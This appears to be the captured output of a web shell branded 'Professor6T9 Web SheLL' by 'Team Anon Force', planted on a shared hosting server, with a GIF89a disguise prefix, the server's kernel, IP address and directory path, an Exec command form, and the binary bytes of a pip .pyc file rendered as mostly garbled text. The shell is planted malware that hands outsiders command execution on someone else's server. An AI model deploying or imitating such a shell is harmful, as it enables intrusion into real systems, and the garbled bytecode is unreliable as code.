GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
index
/
__pycache__
[ HOME ]
Exec
Submit
collector.cpython-311.pyc
� L�i? � �� � d Z ddlmZ ddlZddlZddlZddlZddlZddl Z ddl Z ddlZddl mZmZmZ ddlmZ ddlmZ ddlmZ ddlmZmZmZ dd lmZ dd lmZ ddlm Z m!Z! ddl"m#Z# dd l$m%Z% ddl&m'Z' ddl(m)Z) ddl*m+Z+ ddl,m-Z- ddl.m/Z/ ddl0m1Z1 ddl2m3Z3 ddl4m5Z5m6Z6m7Z7 e j8 e9� � Z:ee;e;f Z<dJd�Z= G d� de>� � Z?dKd!�Z@ G d"� d#e>� � ZAdLd&�ZBdMd'�ZCdNd*�ZD G d+� d,� � ZE G d-� d.e� � ZFdOd0�ZGeGdPd4�� � ZH ed5�6� � G d7� d2� � � � ZI G d8� d9e� � ZJ dQdRd@�ZK dSdTdC�ZLdUdE�ZM G dF� dGe� � ZN G dH� dI� � ZOdS )VzO The main purpose of this module is to expose LinkCollector.collect_sources(). � )�annotationsN)�Iterable�MutableMapping�Sequence)� dataclass)� HTMLParser)�Values)�Callable� NamedTuple�Protocol)�requests)�Response)� RetryError�SSLError)�NetworkConnectionError)�Link)�SearchScope)� PipSession)�raise_for_status)�is_archive_file��redact_auth_from_url)�url_to_path)�vcs� )�CandidatesFromPage� LinkSource�build_source�url�str�return� str | Nonec � � t j D ]D}| � � � � |� � r| t |� � dv r|c S �EdS )zgLook for VCS schemes in the URL. Returns the matched VCS scheme, or None if there's no match. z+:N)r �schemes�lower� startswith�len)r �schemes �}/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/pip/_internal/index/collector.py�_match_vcs_schemer* . sW � � �+� � ���9�9�;�;�!�!�&�)�)� �c�#�f�+�+�.>�$�.F�.F��M�M�M���4� c � � � e Zd Zd� fd�Z� xZS )�_NotAPIContent�content_typer �request_descr! �Nonec �h �� t � � � ||� � || _ || _ d S �N)�super�__init__r. r/ )�selfr. r/ � __class__s �r) r4 z_NotAPIContent.__init__: s3 �� � ������|�4�4�4�(���(����r+ )r. r r/ r r! r0 )�__name__� __module__�__qualname__r4 � __classcell__�r6 s @r) r- r- 9 s= �� � � � � �)� )� )� )� )� )� )� )� )� )r+ r- �responser r0 c �� � | j � dd� � }|� � � }|� d� � rdS t || j j � � �)z� Check the Content-Type header to ensure the response contains a Simple API Response. Raises `_NotAPIContent` if the content type is not a valid content-type. �Content-Type�Unknown)z text/htmlz#application/vnd.pypi.simple.v1+html�#application/vnd.pypi.simple.v1+jsonN)�headers�getr% r&